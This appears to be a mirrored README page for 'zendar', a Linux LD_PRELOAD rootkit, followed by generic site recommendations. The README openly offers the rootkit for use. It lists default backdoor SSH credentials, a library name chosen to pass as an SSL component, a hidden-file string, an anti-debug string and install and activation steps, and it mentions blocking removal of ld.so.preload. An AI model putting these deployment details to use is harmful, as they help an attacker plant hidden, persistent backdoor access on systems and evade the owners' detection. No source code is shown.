Coder Social home page Coder Social logo

zendar's Introduction

This is a private rootkit, and thus this README will not adhere to public requirements or preferences.
Scrap that. I have virtually no need for this, it's just a shittier, but smaller version of an azazel/jynx2 hybrid. Do whatever you want with this.
Alright, apparently there was some kind of strange interest in this. @Reiko: I changed how the user is prevented from removing the ld.so.preload file. I still use strstr(), so I do apologize for that, I will eventually get around to using a better method.
I understand that having to change configurable variables in both install and zendar.c is a tedious operation, I will centralize all variables in the install script eventually. I have a free weekend so expect that to happen this week. 
@Reiko: I also removed ptrace() from the kit.
Default configuration variables:    (install)
                                    username = "zendar"
                                    password = "zendar123"
                                    salt = "password_salt"
                                    home_dir = "/etc/ld.so.conf.d/"
                                    install_dir = "/lib/"
									lib_name = "libsslcore.so"
                                    (zendar.c)
                                    HIDDEN_STRING "_zendar"
									LIB_NAME "libsslcore.so"
                                    undef DEBUG
                                    ANTI_DEBUG "Secret Sex Loaf of a Single Mom"

Installation & Usage:               (installation)
                                    tar xvpf zendar.tar
									sudo ./install
                                    (usage)
                                    ssh username@host
                                        (the following will enable core utilities)
                                        alias ls='ls --color=auto'
                                        export PS1='\u@zendar \W >> '
                                            (VITAL, YOU MUST ENABLE THE FOLLOWING!)
                                                export ZENDAR='1'

zendar's People

Watchers

Endrigo Antonini avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.